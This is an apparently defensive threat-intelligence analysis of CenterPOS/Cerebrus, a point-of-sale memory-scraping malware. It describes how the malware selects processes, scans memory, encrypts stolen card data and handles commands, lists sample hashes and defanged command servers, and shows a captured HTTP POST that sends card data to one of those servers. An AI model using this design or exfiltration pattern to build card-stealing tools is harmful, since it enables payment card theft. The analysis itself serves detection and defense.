Introduction
There has been no shortage of point-of-sale (POS) threats in the past couple of years. This type of malicious software has gained widespread notoriety in recent time due to its use in high-profile breaches, some of which involved well-known brick and mortar retailers and led to the compromise of millions of payment cards. Our investigation into these threats has led to the analysis of a relatively newer POS malware known as CenterPOS.
CenterPOS
CenterPOS malware was initially discovered in September 2015 in a directory filled with other POS malware, including NewPoSThings, two Alina variants known as “Spark” and “Joker,” and BlackPOS. This CenterPOS sample (171c4c62ab2001c2f2394c3ec021dfa3) contains an internal version of “1.7” and is a memory scraper that iterates through running processes in order to extract payment card information. The payment card information is transferred to a command and control (CnC) server via HTTP POST:
POST /2kj1h43.php HTTP/1.1
Content-Type: multipart/form-data; boundary=axlmcc3u.x5w
Host: jackkk[.]com
Content-Length: 159
Expect: 100-continue
Connection: Keep-Alive
--axlmcc3u.x5w
Content-Disposition: form-data; name="userfile";filename="1432.txt"
Content-Type: application/octet-stream
AAAAAAAAAAAA
--axlmcc3u.x5w--
Table 1 shows several CenterPOS v1.7 variants and their associated CnC locations.
MD5 | CnC | Version |
171c4c62ab2001c2f2394c3ec021dfa3 | jackkk[.]com (resolves to 138.204.168.109) | 1.7 |
7e6b2f107f6dbc1bc406f4359de4c5db | 188.120.227.156 | 1.7 |
ef5e361a6b16d682e1506aba6164feee | 188.120.227.156 | 1.7 |
c9d4ff350f26c11b934e19bb1ef7698d | rs000370.fastrootserver[.]de (resolves to 89.163.209.117) | 1.7 |
0d142438f731652b746c9ad7fd1a9850 | sobra[.]ws (resolves to 50.7.193.210) | 1.7 |
Table 1: CenterPOS v1.7 samples
We discovered a live CnC server (the admin panel is shown in Figure 1) that allowed us to confirm that CenterPOS is known as “Cerebrus” in the underground (not to be confused with the RAT known as Cerberus).
Figure 1: Cerebrus 1.7 (CenterPOS) Admin Panel Login
Further investigation revealed that there is a new version of CenterPOS, version 2.0, that is functionally very similar to version 1.7. The key difference is that version 2.0 uses a configuration file to store the CnC information. When executed, the malware checks for a configuration file that can be located in one of three locations:
- Appended to the end of the file enclosed by the strings [dup] ... [/dup].
- A file named mscorsv.nlp located in the same directory.
- In the registry: HKLMSYSTEMCurrentControlSetControlFramework.NET
If a configuration file is not present, the malware will open a dialog box that prompts for a password. If the correct password is entered, a dialog box will appear that allows an operator to enter CnC information, as well as a password used to encrypt the configuration file (see Figure 2).
Figure 2: Cerebrus 2.0 (CenterPOS) Configuration Builder
The malware contains two modes for scraping memory and looking for credit card information, a “smart scan” mode and a “normal scan” mode. The “normal scan” mode will act nearly the same as v1.7:
The malware iterates over all processes and begins searching process memory space if the process meets the following criteria:
- The process is not the current running process.
- The process name is not in the ignore list.
- The process name is not “system,” “system idle process,” or “idle.”
- The process file version info does not contain “microsoft,” “apple inc,” “adobe systems,” “intel corporation,” “vmware,” “mozilla,” or “host process for windows services.”
- The process full path's SHA-256 hash is not in the SHA-256 blacklist.
If the process meets the criteria list, the malware will search all memory regions within the process searching for credit card data with regular expressions in the regular expression list.
In “smart scan” mode, the malware starts by performing a “normal scan.” Any process that has a regular expression match will be added to the “smart scan” list. After the first pass, the malware will only search the processes that are in the “smart scan” list.
After each iteration of scanning all process memory, the malware takes any data that matches and encrypts it using TripleDES with the key found in the configuration file.
The malware will send information about the system and the current settings to the CnC server after every other search. The gathered system information includes all system users, logged in users, sessions, process list, and current settings list. Each of these items will be sent in a separate HTTP POST request.
The malware primarily sends data to the CnC server, but can also receive commands. The malware can receive and process the following list of commands:
- [restartnow] : Restarts the malware service.
- [uninstallnow] : Uninstalls the malware.
- [quitnow] : Terminates the current malware process.
- <script> : <script> is a batch script to be run on the system.
In addition to processing commands, the malware also accepts commands to update its current settings. The following list shows the settings that can be changed:
- [clientlogs] : Enable or disable logging.
- [smartscan] : Enables or disables “smart scan.”
- [bincountreset] : Total number of processes to scan before restarting a scan.
- [blackmamba] : List of blacklisted values that could be matched on by the regular expressions.
- [blackproc] : List of blacklisted process names.
- [regexlist] : Updates the regular expression list for searching process memory.
- [blacksha256] : Updates the blacklist of full path SHA-256 values for processes. Processes in this black list will be terminated.
- [antihack] : Checks the Image File Execution Options settings for several executables and deletes the “Debugger” value name settings and deletes them if they exist. The executable list is: sethc.exe, osk.exe, utilman.exe, magnify.exe, and oks.exe.
- [commonblackcards] : Use blackmamba blacklisted values.
- [restartafter] : Restarts the service after a number of memory scan iterations.
- [restart] : Restarts the malware service.
- [uninstall] : Uninstalls the malware.
The operators control the compromised systems and harvest stolen payment card information through a web interface located on the CnC server, as shown in Figure 3.
Figure 3: Cerebrus 2.0 (CenterPOS) Admin Panel Login
Table 2 shows several CenterPOS v2.0 variants and their associated CnC locations.
MD5 | CnC | Version |
1acf2eed3c5a8a85a34e606dd897eaac | www.x00x[.]la (resolves to 193.189.117.58) | 2.0 |
96b65da18a72987e1dd3be2a947412c5 | 193.111.139.142 | 2.0 |
a54b0812f003bb15891709ab7a125828 | 5m0k3[.]lol (resolves to 193.189.117.58) | 2.0 |
1d7d70c0699db32817f910942e7a619a | www.amprofile.co[.]uk (resolves to 193.189.116.29) | 2.0 |
Table 2: CenterPOS v2.0 samples
Conclusion
There is an increasing demand for POS malware in the underground as cybercriminals continue to target retailers in order to steal payment card information. CenterPOS, known in the underground as Cerebrus, is continuing to evolve. This version contains functionality that allows cybercriminals to create a configuration file. In contrast to the traditional builder-server model, the configuration file can be created from the payload itself, allowing the operators to easily update the CnC information if necessary.